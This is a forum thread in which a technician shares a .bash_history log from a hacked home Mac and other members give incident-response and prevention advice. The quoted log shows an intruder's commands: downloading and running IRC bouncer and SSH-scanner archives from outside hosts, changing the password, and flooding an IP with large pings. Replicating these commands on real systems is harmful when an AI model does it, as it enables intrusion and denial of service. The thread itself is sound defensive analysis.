possible machine compromise?

[artgeek]

Hi y'all,

Found this little tidbit on a home machine while servicing. The user's ".bash_history" document reflects ftp downloads and software installs. The user is not a CLI user, at all. There is a PC on the home LAN, but no file-sharing is active. Got any opinions based on the following document excerpt. And any recommendations to prevent this from happening again -> aside from a router at the client's home, which is being installed now. I have wiped the HD, and re-installed the OS while off-network.

I haven't seen a compromised Mac before, but this looks like the issue. Thanks for your opinions. File excerpt follows:

cd .x
ls
cd ..
tar czvf mechDarwin.tgz .x
ftp bambistuff.go.ro
ftp bambistuff.go.ro
w
w
ls
ddevc
cddev
ls
cd dev
ls
cd ..
ls
w
ps x
kill -9 721
cd /var/tmp
ls
cd ...
cd emech
ls
cd ..
rm -rf x
rm -rf .x
ftp bambistuff.go.ro
tar zxf mDarwin.tgz
cd .x
./sh
w
passwd
w
ls
ls
wget steaua87.go.ro/psyDarwin.tgz
ftp pacorabane.3x.ro/psyDarwin.tgz
ftp pacorabane.3x.ro
ftp pacorabane.3x.ro
ls
tar xzvf psyDarwin.tgz
ls
cd psybnc
ls
./psybnc
make
cd sites
cd ..
ls
cd sites
ls
cd ..
ls
tar zxvf mech.tgz
dir
ls
tar zxvf mech.tgz
cd psybnc
ls
cd config.h
wget
w
uptime
uname -a
ping
ping -c 9999 -s 25000 81.180.106.5
ping -c 9999 -s 8000 81.180.106.5
exit
w
exit
w
wget
ftp
ftp 193.230.153.143
tar xvzf psyBNC.tgz
cd psybnc
./psybnc
uname -a
s
passwd
wget geocities.com/teroristuro/psybnc.tar.gz
ls
wget irehs.home.ro/sshss.tar.gz
ps -aux
ls
tar zxfv psyDarwin.tgz
cd psybnc
ls
make
pico psybnc.conf
./psybnc
cd
ls
cd ..
ls
cd
ls
cd movies
ls
cd
cd Desktop
ls
cd /tmp
ls
mkdir uzi
ls
cd .uzi
cd /uzi
cd uzi
mail
cd uzi
mkdir " "

[catfish]

Wow, good thing the cracker didn't waste the .bash_history.

What services were running on the machine?

Did the user and/or root have a non-obvious password set?

Here are some things to check:

1 run last as root to check the last bunch of logins on the machine, this will only go from the start of wtmp so you may want to check against some of the archived ones (/var/log/wtmp.*)

2 run netstat -a | less to check for weird network services that may be running

3 turn on the firewall

I would probably consider a re-install.

here is link for psybnc:

http://www.jestrix.net/tuts/psy.html

It looks like they were setting the machine up as a bouncer for IRC.

Another you might want to do is compare the sizes and md5's of some of the system utilities against a known good machine to be sure the commands aren't contaminated or anything.

[hayne]

Quote: Originally Posted by catfish Another you might want to do is compare the sizes and md5's of some of the system utilities against a known good machine to be sure the commands aren't contaminated or anything.

When a machine has been compromised, you cannot trust anything that you get from that machine. The OS may have been modified to hide all changes. Even examining files on that machines hard disk while mounted on another machine might be misleading as the compromised OS is still involved. The only sure thing to do is to erase the disk (using utilities external to the machine) and reinstall the OS from known good media. That is what the original poster did.

[AntiGenX]

Quote: Originally Posted by catfish Did the user and/or root have a non-obvious password set? Here are some things to check: 1 run last as root to check the last bunch of logins on the machine, this will only go from the start of wtmp so you may want to check against some of the archived ones (/var/log/wtmp.*) 2 run netstat -a | less to check for weird network services that may be running 3 turn on the firewall I would probably consider a re-install. here is link for psybnc: http://www.jestrix.net/tuts/psy.html It looks like they were setting the machine up as a bouncer for IRC. Another you might want to do is compare the sizes and md5's of some of the system utilities against a known good machine to be sure the commands aren't contaminated or anything.

I see you've already wiped the machine, but in the spirit of helping anyone else reading this here are my tips for dealing with a compromised machine:

First of all unplug the machine from the network, then backup any critical data on the machine. DO NOT backup any applications, then do a clean install. The only reason you would want to have the system still running is for forensic purposes.

Despite what catfish has suggested (no offense catfish), "stange services" may not appear even if the machine is compromised. A good rootkit will replace system utilities so their presence is masked. This is not limited to network services. Good rootkits can hide files from ls, installed kernel extensions, and various other "tell tale" signs of exploits. 'last' will not necessarily show any strange logins as it is very easy to either rewrite the wtmp (login) database, use a non-logging login daemon, or even have a "reverse" shell running that connects outbound instead of in.

Unless you need to preform an autopsy on this machine reload the OS IMMEDIATELY. If you do need to preform an autopsy, install a new OS onto another drive an ONLY boot from that one, then mount the compromised drive and preform any tests you need. Do not try to run any applications or utilities directly from the compromised drive.

After you have a clean install that is uncompromised. Change ALL of your passwords, especially Banks, Credit Card Companies, and any merchant that may have your credit card info on file (e.g. Amazon, Paypal, etc..).

I cannot stress enough that you should not try to copy any programs from the compromised drive, there is no guarantee that they are not compromised as well....

I've spent several years in the UNIX security field so I've had experience with this (though mostly on Solairs, HP-UX, AIX and Linux, I'm new to OS X), take my word for it, and treat this very seriously.

Let me know if there is something that I can help you with and I'll do my best.

-Jonathan

[AntiGenX]

As a follow up:

I noticed that a geocities account was used to download a file...

Quote: wget geocities.com/teroristuro/psybnc.tar.gz

While it might be not against their terms of service to have such files on the server, I'd bet that it is against their terms of service to use their systems to assist in compromising other systems. I would contact them and let them know that this account was used for that purpose.

Also, there are several other IPs and domain names listed. You could use ARIN to look up the netblock owner for those IPs and email the ISP to let them know what's going on.

Or you could try to let the FBI or you local law enforcement know, but they're usually ill equiped or too understaffed to help...

-Jonathan

[hayne]

Quote: Originally Posted by AntiGenX I noticed that a geocities account was used to download a file... While it might be not against their terms of service to have such files on the server, I'd bet that it is against their terms of service to use their systems to assist in compromising other systems. I would contact them and let them know that this account was used for that purpose.

Done. (via their abuse reporting form)

[edit]
That geocities URL now gives: "We're sorry, but this page is currently unavailable for viewing." - so I guess the account has been terminated.
[/edit]

[acme.mail.order]

Quote: Originally Posted by catfish Wow, good thing the cracker didn't waste the .bash_history.

It looks like a script kiddie who's done a little homework. There's some navigation errors, a DOS command (dir) and `make` needs DevTools. Probably didn't know enough to cover his tracks well. One of the downloaded files contains a bunch of "h4ck3r 101 ph0r 5crip7 kiddi35" files.
Still, compromise is compromise. Unless you want to be another Cliff Stoll break out the install discs, beer and movies

[dmacks]

"psybnc" is a general irc relay/server. Maybe setting up a node on a warez distribution network, or else installing some zombie process that uses irc as the control channel?

"sshss" appears to be a remote scanner for ssh vulnerabilities, except it only runs on linux.

[artgeek]

I very appreciate all your comments. And Thanks to hayne for reporting to geocities. Basically have done what you all suggested. I believe this attack was initiated from within the LAN from the PC -> it is being checked now, and a firewall is being installed. I'll post anything new that I find.

Hah. Nice Clifford Stoll ref

Thanks again. See ya all soon.

ag

[catfish]

Hi All,

Sorry, I should have been more clear in my original post.

My suggestions were for forensics of the cracked machine. I like to know what happened and why and where it is going.

Of course a cracked machine is tainted goods and should be re-installed.

I missed the part where he said he already formatted the machine.

[derekhed]

This is the second post I have read on these forums where a Mac was cracked on a local network shared with PCs. All security flames aside, what would be the best way to run this sort of network and keep this from happening?

[wgscott]

Looks like a script kiddie:

http://www.lug.ro/mlist/archive/humo...4-10/0199.html

[wgscott]

Another security measure to take is to use tcpwrappers, which is pretty easy to implement:

http://www.hmug.org/HowTos/tcpwrappers.html

[acme.mail.order]

Quote: Originally Posted by derekhed what would be the best way to run this sort of network and keep this from happening?

keylog the pc's, find an offender (any one if there are several), take him to the lobby and shoot* him. "Pour encourager les autres" as Voltaire so nicely put it.

* Substitute dismissal if summary executions are frowned upon in your municipality.

[derekhed]

acme, you need to switch to decaf man. Do you think the PCs are sniffing the local network traffic? I guess we aren't going to learn from artgeek how they go in.

[hayne]

Quote: Originally Posted by artgeek any recommendations to prevent this from happening again

You should attempt to find out from your client what the configuration of the machine was. What accounts existed? What were their passwords? Who knew these passwords?
Was "Remote Login" activated (in Sharing preferences)

Had the client downloaded any software from other than reputable sources? In particular, any software that asked for the admin password?
Make the client aware that pirated versions of commercial software are often trojan horses.
Try to make the client extremely leery of providing the admin password for anything other than software from reputable sources.

[mohclips]

Quote: Originally Posted by artgeek Hi y'all, Found this little tidbit on a home machine while servicing. The user's ".bash_history" document reflects ftp downloads and software installs. The user is not a CLI user, at all. There is a PC on the home LAN, but no file-sharing is active. Got any opinions based on the following document excerpt. And any recommendations to prevent this from happening again -> aside from a router at the client's home, which is being installed now. I have wiped the HD, and re-installed the OS while off-network. I haven't seen a compromised Mac before, but this looks like the issue. Thanks for your opinions. File excerpt follows:

Beware the sshs pkg downloaded, pscan2 contained within is the Linux remote shell trojan. Obviously this wont run on you ppc, but if anyone is thinking of doing any forensics on the wget'ed archives (this one is linux x86 based)...

;-)

Mohclips.